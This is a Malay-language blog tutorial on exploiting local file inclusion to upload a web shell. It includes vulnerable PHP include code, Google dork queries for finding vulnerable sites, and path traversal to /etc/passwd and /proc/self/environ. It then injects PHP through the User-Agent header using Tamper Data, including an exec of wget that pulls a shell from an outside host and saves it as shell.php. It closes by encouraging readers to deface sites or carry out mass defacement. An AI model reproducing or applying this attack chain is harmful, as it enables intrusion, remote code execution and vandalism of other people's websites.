LFI dan shell upload (Temper Data)

salam sejahtera semua .

Ok.. hari ni saya nak buat tutorial cara upload shell dengan mengunakan keadeh Temper data dalam pengurusan LFI

Ok.. website yang vuln LFI adalah berupa :

www.website.com/index.php?page=/etc/passwd

ini code yang membenarkanya Vulnerable

<?php
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>

ada beberapa Tool yang diperlukan :

1:Firefox
2:Temper Data (Download)
Dan Vulnerable Website

Boleh digunakan untuk mencari Website yang vulnerable :


inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Ok.. jadi sekarang saya akan tunjukan bagaimana cara untuk 'exploit' dan upload shell dengan temper data .image_2317891.original.jpg (620×511)

sekarang website ini telah di letakan exploit

../../../../../../../etc/passwd

ok.. sekarang saya berasa berminat ingin mencuba HTTP_USER_AGENT..

Ok.. ingat temper data tadi ? sekarang korang buka Temper data pada bahagian Tool ataupun juga ada pada Option

image_2317897.original.jpg (264×306)



Ok.. sekarang tool itu akan seruba macam gambar di bawah



image_2317896.original.jpg (478×620)


Sebelum memulakan langkah yag seterusnya . korang kena tukar

../../../../../../../etc/passwd

kepada

../../../../../../.. /proc/self/environ

Ingat . bukan semua website akan memaparkan benda uyang sama setelah dimasukan Proc/self/environ

maka ia akan keluar macam gambar di bawah

image_2317892.original.jpg (620×383)


Page mesti masih berada pada proc

Selepas itu tekan Start Tempers dan refresh website yang vulnerable LFI tadi

saya sudah mencuba beberapa code injection . maka akan menjadi seperti ini:

image_2317893.original.jpg (620×260)


Di dalam user agent taip :

<?php phpinfo();?>

sekarang pade downloading .

ok.. selepas itu korang akan melihat Website tadi macam gambar di bawah ni:


image_2317894.original.jpg (620×453)

Maksutnya saya boleh excute code . jadi ? mari kita upload Shell


ok .. Sekarang . pergi ke kotak User agent dan masukan code ini

<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

(-O <- bermaksut Dinamakan Semula)

Ok.. rujuk gambar di bawah

image_2317898.original.jpg (620×262)

Peringatan:

http://www.site.com/shell.txt <-- itu adalah website yang korang telah uploadkan shell dengan extention .TXT . Jadi saya sudah sediakan Code shell kepada anda .

Shell <--

Jika korang nak gunakan shell korang sendiri. dipersilakan dengan hormatnya . upload di dalam webhosting yang percuma . dengan menamakanya Text.txt

di dalam text.txt itu adalah code shell korang sendiri .

Bila korang sudah selesaikan seperti yang di atas . masa untuk masuk kedalam shell yang korang excute tadi .

http://site/shell.php

jika gagal . gunakan langkah ini

http://www.site.com/index.php?page=/etc/passwd

Upload shell dengan keadah yang sama ..

http://www.site.com/index.php?page=shell.php

Ok.. jadi gambar di bawah adalah shell yang saya sudah upload tadi . cari index.php . edit dan masukan code deface korang ataupun korang lakukan mass defacement .


image_2317895.original.jpg (620×334)


Gunakan akal dan Cretiviti . Google Dulu sebelum Bertanya :)

Maaf pengunaan Aku pada yang lebih berusia ..

(blog ini masih dalam mengubah suaian) :D

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)